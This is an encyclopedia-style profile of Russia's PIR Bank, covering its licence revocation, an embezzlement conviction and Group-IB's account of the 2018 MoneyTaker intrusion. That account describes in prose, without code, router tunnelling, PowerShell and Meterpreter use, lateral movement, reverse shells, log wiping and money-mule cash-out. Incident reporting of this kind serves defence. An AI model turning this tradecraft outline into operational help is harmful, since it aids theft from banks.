Industrial and Investment Settlement Bank PIR Bank

Limited Liability Company Industrial and Investment Settlements Bank (PIR Bank LLC) is a universal capital credit institution. General License CENTRAL BANK OF THE RUSSIAN FEDERATION No. 2655. The bank began its work on January 20, 1994 and has been operating in the banking market Russia for more than 22 years. The Bank is a member of the ARB Moscow Banking Union, the International Payment System VISA International, the foreign exchange market section, MICEX as well as the deposit insurance system, certificate No. 284 of December 9, 2004.

PIR Bank has been operating in the financial services market since 1994 and offers its clients a wide range of financial services, including settlement and cash services, collection, lending, deposit operations, documentary operations, issuance and maintenance of plastic cards, individual bank safes, Personal Manager service and other banking services.

2024: Former Deputy Chairman of the Board Andrei Serebrennikov sentenced to 4 years in prison for embezzlement of 57 million rubles

On August 14, 2024, the Presnensky District Court of Moscow found the former deputy chairman of the board of Pir-Bank Andrei Serebrennikov guilty of embezzling more than 57 million rubles from a credit institution. The defendant received four years in prison. Read more here

2018

Central Bank revoked the license from PIR Bank

Since October 12, the Bank of Russia has revoked the banking license from PIR Bank. This was reported in the press service of the Central Bank. According to the reporting data, the credit institution ranked 296 in the banking system of the Russian Federation in terms of assets per 01.10.2018.

"The activities of PIR Bank LLC revealed numerous violations of the legislation and regulations of the Bank of Russia in the field of countering the legalization (laundering) of proceeds from crime and the financing of terrorism (AML/CFT) in terms of the completeness and reliability of information sent to the authorized body, including on operations subject to mandatory control," the Central Bank noted.

For a long time, PIR Bank LLC was in the view of the Bank of Russia in connection with transit dubious operations. The decrease in the volume of these operations occurred solely based on the results of the regulator's application of appropriate restrictive measures.

The Bank of Russia has repeatedly (4 times in the last 12 months) applied supervisory measures against PIR Bank LLC, including twice imposing restrictions on attracting funds from the population.

In the current circumstances, the Bank of Russia decided to revoke the banking license from PIR Bank LLC.

PIR Bank LLC is a member of the deposit insurance system

Group-IB: PIR Bank was attacked by the hacker group MoneyTaker

Group-IB, an international company specializing in the prevention of cyber attacks and the development of information security products, found that the MoneyTaker criminal group is behind the attack on the Russian PIR Bank and an attempt to steal several tens of millions of rubles. The incident occurred on July 3 using the AWS of the CBD (automated workplace of the Bank of Russia client). According to the bank, the funds were withdrawn by fan mailing to plastic cards of individuals in 17 banks from the top 50, most of the funds were cashed out on the night of the theft. After that, the attackers tried to "gain a foothold" in the bank's network to prepare subsequent attacks, but were discovered in time by Group-IB specialists.

"As part of the incident, Group-IB specialists helped to establish the alleged source of the attack as soon as possible, build a chain of events, and localize the problem. At the moment, the bank is operating normally, all the recommendations of Group-IB apply and will be used in the bank's work in order to prevent such incidents in the future, "said Olga Kolosova, Chairman of the Board of PIR Bank LLC.

After examining the infected workstations and servers of the financial institution, forensic experts at Group-IB collected irrefutable digital evidence of involvement in the theft of hackers from MoneyTaker. In particular, experts discovered tools that the MoneyTaker group had previously used to carry out attacks on banks, malware that allows you to unequivocally attribute the incident, IP addresses from which malware was managed, and the method of penetration into the network itself. Recommendations to prevent such attacks were sent to financial organizations - clients and partners of Group-IB, including the Central Bank of Russia. MoneyTaker is a criminal group specialising in targeted attacks on financial institutions that was uncovered by Group-IB experts last December, publishing an analytical report: "MoneyTaker: a year and a half below the radar." The main goals of hackers in banks are card processing and interbank transfer systems (AWS CBD and SWIFT).

As Group-IB specialists found out, the attack on PIR Bank began at the end of May 2018. The alleged entry point was a compromised network device (router) located in one of the territorial divisions of the bank. Tunnels were configured on the router, allowing attackers to gain access to the bank's local network. Group-IB emphasized: this method of penetration into the network is characteristic of the MoneyTaker group. At least three times, hackers have already used this scheme in attacks on banks with a regional branch network.

To consolidate the bank's system and automate some stages of the attack, MoneyTaker hackers traditionally use scripts on PowerShell. Group-IB experts wrote about this method in detail in their December report. Having penetrated the main network of the bank, the attackers were able to gain access to the AWS of the CBD (automated workplace of the Bank of Russia client), form payment orders and send money in several tranches "on the flight" to pre-prepared accounts.

On the morning of July 4, having discovered numerous unauthorized transactions totaling several tens of millions of rubles, the Bank's employees turned to the regulator with a request to urgently block the correspondent account and digital keys of the electronic signature (EA) of the CBD AWS, but it was not possible to promptly suspend all financial transfers. Most of the stolen funds were transferred to several dozen cards of the largest banks in the Russian Federation and immediately cashed out by accomplices of hackers - mules (money mule), attracted to the final stage of withdrawing money from ATMs.

To make it difficult to respond to the incident and further investigate it, the attackers destroyed traces of being in the system characteristic of MoneyTaker in a way: on numerous computers, system logs of the operating system, logs of application systems were cleaned and system files were deleted. However, Group-IB forensic experts step by step restored all the actions and tools of cybercriminals: launching services through PowerShell scripts to gain full control over selected workstations and servers using the Meterpreter (Metasploit Framework), distribution over the network using RDP, SMB, Dameware Mini Remote Control and Radmin, and so on.

In addition, hackers left on the servers a number of so-called reverseshells - programs that connected from the bank's network to the servers of attackers and expected new commands for the possibility of repeated attacks and access to the network. All this was identified by Group-IB employees and removed by the bank's administrators.

"Since the beginning of 2018, this is far from the first successful attack on a Russian bank, which ended with the withdrawal of money," said Valery Baulin, head of the Group-IB computer forensics laboratory. - We are aware of at least three such incidents, but we cannot disclose details until the investigation is completed. As for the output schemes: each group specializing in targeted attacks - Cobalt, with and MoneyTaker (they are the most active in 2018) - the scheme is its own, it depends on the amount and cash-in scenarios that hackers have. You need to understand that attacks on the CBD AWS are difficult to implement and do not often, since not everyone can successfully work on a machine with the CBD AWS. One of the largest attacks of this kind remains the incident of the 2016 model, when MoneyTaker hackers withdrew about 120 million rubles using a self-described program of the same name. "

The first MoneyTaker attack was recorded in the spring of 2016, when money was stolen from a US bank as a result of gaining access to FirstData's STAR card processing system. After that, hackers "laid to the bottom" for almost 4 months and only in September 2016 attacked banks in Russia. This time, their goal was the AWS of the CBD - the Russian system of interbank transfers. In general, in 2016, Group-IB recorded 10 MoneyTaker attacks in the United States, England and Russia. Since 2017, the geography of attacks has narrowed to Russia and the United States. In 2018, we recorded two MoneyTaker attacks in Russia.

MoneyTaker has its own unique "handwriting." Hackers try to go unnoticed, use "one-time" infrastructure, "disembodied" programs and carefully cover the traces of their presence. They are distinguished by a unique set of tools (to pin to the system, the group uses the Metasploit and PowerShell Empire framework).

Obviously, MoneyTaker poses no less a threat than the Cobalt group, named by the Central Bank as the main threat of Russian banks. In connection with the incident at PIR Bank, Group-IB provided recommendations to the security services of financial institutions on how to minimize the danger posed by this group. Since in most successful MoneyTaker attacks the entry point was routers, it is necessary, first of all, to check them for the presence of the latest firmware, for the ability to brute force passwords and the ability to quickly detect the fact of changing the configuration of the router.

A Group-IB report in December said MoneyTaker had 16 attacks in the US by then, 3 on Russian banks and 1 on an IT company in the UK. In the United States, the average damage from a single attack was $500,000. In Russia, the average amount of funds withdrawn is 72 million rubles. In addition to money, attackers steal documentation on interbank payment systems necessary to prepare further attacks.

See also

• Bank losses from cybercrime
• Information security in banks
• Central Bank policy in the field of information protection in the banking system